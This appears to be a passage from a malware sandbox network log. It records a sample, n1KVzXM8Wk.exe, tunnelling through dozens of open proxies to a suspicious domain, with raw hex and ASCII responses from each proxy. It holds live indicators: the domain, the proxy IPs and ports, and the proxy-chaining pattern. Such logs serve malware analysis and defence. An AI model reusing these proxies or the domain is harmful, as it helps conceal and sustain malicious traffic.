                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.429904938 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:21.689177990 CET1286INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Server: Apache/2.4.56 (Ubuntu)
                                                                                                      Set-Cookie: PHPSESSID=nfshhklu4djtf5q12bdn50kbdb; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Vary: Accept-Encoding
                                                                                                      Content-Length: 5101
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 69 6d 67 2f 66 75 74 75 72 61 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 55 54 55 52 41 31 30 30 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 20 46 6f 6e 74 66 61 63 65 73 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 66 6f 6e 74 2d 66 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2d 35 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 6d 64 69 2d 66 6f 6e 74 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 0d 0a 3c 21 2d 2d 20 63 6f 64 69 67 6f 73 20 43 53 53 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 61 6e 69 6d 73 69 74 69 6f 6e 2f 61 6e 69 6d 73 69 74 69 6f 6e 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="icon" href="static/src/img/futura.png"> <title>FUTURA100</title><link href="css/style.css" rel="stylesheet" media="all">... Fontfaces CSS--><link href="css/font-face.css" rel="stylesheet" media="all"><link href="codigos/font-awesome-5/css/fontawesome-all.min.css" rel="stylesheet" media="all">...<link href="codigos/mdi-font/css/material-design-iconic-font.min.css" rel="stylesheet" media="all">-->... Bootstrap CSS--><link href="static/lib/css/bootstrap/bootstrap.css" rel="stylesheet" media="all">... codigos CSS<link href="codigos/animsition/animsition.min.css" rel="stylesheet" media="all"><link href="codigos/perfect-scrollbar/perfect-scrollbar.css" rel="stylesheet" media="all">-->...
                                                                                                      Feb 23, 2024 09:45:21.689225912 CET1286INData Raw: 20 4d 61 69 6e 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 74 6f 75 72 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22
                                                                                                      Data Ascii: Main CSS--><link href="css/bootstrap-tour.min.css" rel="stylesheet" media="all"><link href="css/bootstrap-tour-standalone.css" rel="stylesheet" media="all"><link href="css/theme.css" rel="stylesheet" media="all"><link rel="stylesh
                                                                                                      Feb 23, 2024 09:45:21.689327955 CET1286INData Raw: 74 72 61 70 2d 74 6f 75 72 2d 30 2e 31 32 2e 30 2f 72 65 74 69 6e 61 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63
                                                                                                      Data Ascii: trap-tour-0.12.0/retina.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/xlsx/0.18.5/xlsx.full.min.js" integrity="sha512-r22gChDnGvBylk90+2e/ycr3RVrDi8DIOkIGNhJlKfuyQM4tIRAI062MaV8sfjQKYVGjOBaZBOA87z+IhZE9DA==" crossorigi
                                                                                                      Feb 23, 2024 09:45:21.689371109 CET1286INData Raw: 69 c3 b3 6e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e
                                                                                                      Data Ascii: in</button> </div> </div> </div> </div> <div class="p-3 d-flex justify-content-center mt-5" style="background-color: rgba(0, 0, 0, -0.9);width: 400px; margin-left:auto;margin-r
                                                                                                      Feb 23, 2024 09:45:21.689434052 CET298INData Raw: 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6c 6f 67 69
                                                                                                      Data Ascii: <script src="static/src/js/main.js"></script> <script src="static/src/js/login.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootstrap-tour.min.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootst
                                                                                                      Feb 23, 2024 09:45:21.701879025 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 5b 21 12 fe 14 57 aa c5 1c b0 d3 fa 89 97 20 e0 8d b1 9e fc 3a 94 8b c0 e9 93 b5 be 15 a7 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                      Data Ascii: e[!W :*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#C_r}zH&5{_G>atr
                                                                                                      Feb 23, 2024 09:45:21.956558943 CET494INHTTP/1.1 400 Bad Request
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Server: Apache/2.4.56 (Ubuntu)
                                                                                                      Content-Length: 312
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 67 72 2e 66 75 74 75 72 61 31 30 30 2e 63 6f 6d 2e 70 79 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Ubuntu) Server at agr.futura100.com.py Port 80</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      624192.168.2.452093162.223.89.84806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.431581974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      625192.168.2.45187058.234.116.19781936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.433043957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      626192.168.2.452121172.64.86.217806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.447774887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.535453081 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      627192.168.2.45200798.170.57.24941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.448648930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      628192.168.2.452113104.19.124.112806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.448704004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.536040068 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      629192.168.2.45201251.15.230.100163796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.448822021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.620125055 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                      Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      630192.168.2.4521164.246.129.12920526812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.448827028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      631192.168.2.451998188.164.193.178153426812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.450036049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.943802118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.612473011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.830039978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.055263042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.219430923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.377162933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.741163969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.266365051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      632192.168.2.45196951.83.140.7081816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.450819969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.633276939 CET325INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.14.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      633192.168.2.451847222.223.103.23273026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.454489946 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:21.915879011 CET90INHTTP/1.1 200 OK
                                                                                                      Content-Type: application/json
                                                                                                      Connection: close
                                                                                                      Content-Length: 55


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      634192.168.2.452068139.180.39.21080806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.457376957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.646028042 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      635192.168.2.452096154.12.253.232184026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.461064100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.943753004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.443865061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.284288883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.022444963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.701339006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.444164991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.834676027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      636192.168.2.452043194.163.129.179219126812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.464689970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.975018024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.680668116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
